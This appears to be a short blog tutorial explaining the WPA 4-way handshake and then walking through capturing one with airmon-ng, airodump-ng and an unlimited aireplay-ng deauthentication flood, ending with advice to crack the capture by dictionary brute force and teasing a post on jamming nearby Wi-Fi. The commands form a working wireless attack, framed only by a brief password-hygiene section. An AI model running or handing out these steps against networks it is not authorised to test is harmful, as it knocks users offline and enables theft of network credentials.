How to capture 4 way handshake

What is 4 way handshake?

A four-way handshake is a type of network  protocol established by IEEE-802.11i. The four-way handshake provides a secure authentication for data delivered through network .

The four-way handshake is designed so that the access point (or authenticator) and wireless client (or supplicant) can independently prove to each other that they know the PSK/PMK, without ever disclosing the key. Instead of disclosing the key, the access point & client each encrypt messages to each other  see full on wiki
how does a 4 way handshake capture work?
Below is a diagram that you can understand how it works?

4 way handshake
4 way handshake

Image source:wikipedia
In this tutorial we will learn that how to capture a 4 way handshake with aireplay.

so lets start: start up kali,

1. Put your wireless adaptor in monitor mode.

“airmon-ng start yourwlanname”

to check your wlan name try

“ifconfig” ifconfig 2. Find all available network and channel.

“airodump-ng wlan1mon”

3. Create a capture file for a specific network and channel.

“airodump-ng wlan1mon -w anyname -c chanel”

after this you will see a file like this,


4. Now send deauth packets and capture handsheck.

“aireplay-ng –deauth 0 -a BSSID wlan1mon”

if you followed all step correctly then you will see wpa handsheks in top right corner like this,

wpa handshake

now you have wpa handshake, you can brute force them with dictionary.

protect your own wifi:

it is always more secure to use longer passwords. disable wps.

use alpha numeric password with signs.

only permit to known mac address by using mac filter.

log in regularly in router admin panel.

♥♥♥ End ♥♥♥

video tutorials is here

in next post i will share how to brute force captured handshake.

Follow me on Google+ for latest update.

next:how to jam nearby wifi.
 comment are open.

Leave a Reply

Your email address will not be published. Required fields are marked *